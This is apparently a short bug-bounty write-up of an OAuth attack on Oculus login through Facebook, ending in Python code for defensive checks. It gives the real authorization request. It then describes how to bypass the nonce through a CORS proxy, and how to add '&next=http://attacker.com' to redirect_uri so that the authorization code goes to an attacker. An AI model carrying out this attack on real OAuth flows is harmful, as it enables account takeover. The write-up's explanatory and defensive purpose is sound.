Bypass OAuth nonce and steal oculus response code

Introduction

Authorization request:

https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757

Bypass CSRF: make the victim send the request above. Once the request is authorized, Facebook returns the authorization_code to the configured redirect_uri; the redirect_uri check then has to be bypassed so that the authorization_code ends up at the attacker's server.

Exploit

  1. Bypass CSRF
    1a. Use https://crossorigin.me/ to read the nonce
  2. Bypass redirect_uri
    2a. Append &next=http://attacker.com to the redirect_uri

NIN: 2a - requires an open redirect vulnerability in the redirect_uri
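As an added example (not code from the original write-up), the server-side checks that close both steps, in Python: exact-match validation of redirect_uri on the authorization server, session-bound state comparison on the client, and a `next` sanitiser on the callback page. The client id, redirect_uri, nonce and state values are taken from the authorization request above; the registered-URI table and the tampered request are constructed for this example.

```python
from urllib.parse import urlsplit, parse_qs
import hmac

# Registered redirect URI for the client id in the page's authorization request.
# The table is constructed for this example; the values come from that request.
REGISTERED_REDIRECT_URIS = {"1517832211847102": {"https://auth.oculus.com/login/"}}

# The authorization request from the page, and a constructed variant whose
# redirect_uri carries the '?next=' open-redirect parameter of step 2a.
PAGE_AUTH_REQUEST = (
    "https://www.facebook.com/v2.8/dialog/oauth?app_id=1517832211847102"
    "&client_id=1517832211847102&domain=auth.oculus.com&locale=en_GB&origin=1"
    "&redirect_uri=https://auth.oculus.com/login/&response_type=code&sdk=joey"
    "&version=v2.8&nonce=AXRr8eBAjDTBkzQ7&state=d916afa3-3dc1-bab7-fc9d-3c8f44bf757"
)
TAMPERED_AUTH_REQUEST = PAGE_AUTH_REQUEST.replace(
    "redirect_uri=https://auth.oculus.com/login/",
    "redirect_uri=https%3A%2F%2Fauth.oculus.com%2Flogin%2F%3Fnext%3Dhttp%3A%2F%2Fattacker.com",
)

def redirect_uri_allowed(client_id: str, redirect_uri: str) -> bool:
    # Authorization-server side: exact string match only. Prefix matching would
    # accept '.../login/?next=http://attacker.com' and deliver the code to the
    # callback page's open redirect; exact matching rejects every variant.
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())

def authorization_request_ok(url: str) -> bool:
    # Parse an authorization request URL and validate its redirect_uri;
    # duplicated or missing parameters are rejected rather than guessed at.
    q = parse_qs(urlsplit(url).query)
    client, uri = q.get("client_id", []), q.get("redirect_uri", [])
    return len(client) == 1 and len(uri) == 1 and redirect_uri_allowed(client[0], uri[0])

def state_matches(session_state, callback_state) -> bool:
    # Client side: the state on the callback must equal the value stored in this
    # user's session. A nonce or state read from a page through a CORS proxy is
    # not bound to the victim's session, so it fails here; missing values never match.
    if not session_state or not callback_state:
        return False
    return hmac.compare_digest(session_state, callback_state)

def safe_next(next_value: str) -> str:
    # Callback-page side: only a relative path on this site is an acceptable
    # 'next' target, which removes the open redirect that step 2a depends on.
    if not next_value.startswith("/") or next_value.startswith("//") or "\\" in next_value:
        return "/"
    return next_value
```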

Ref

Bypass OAuth nonce and steal oculus response code – Lokesh Kumar – Medium
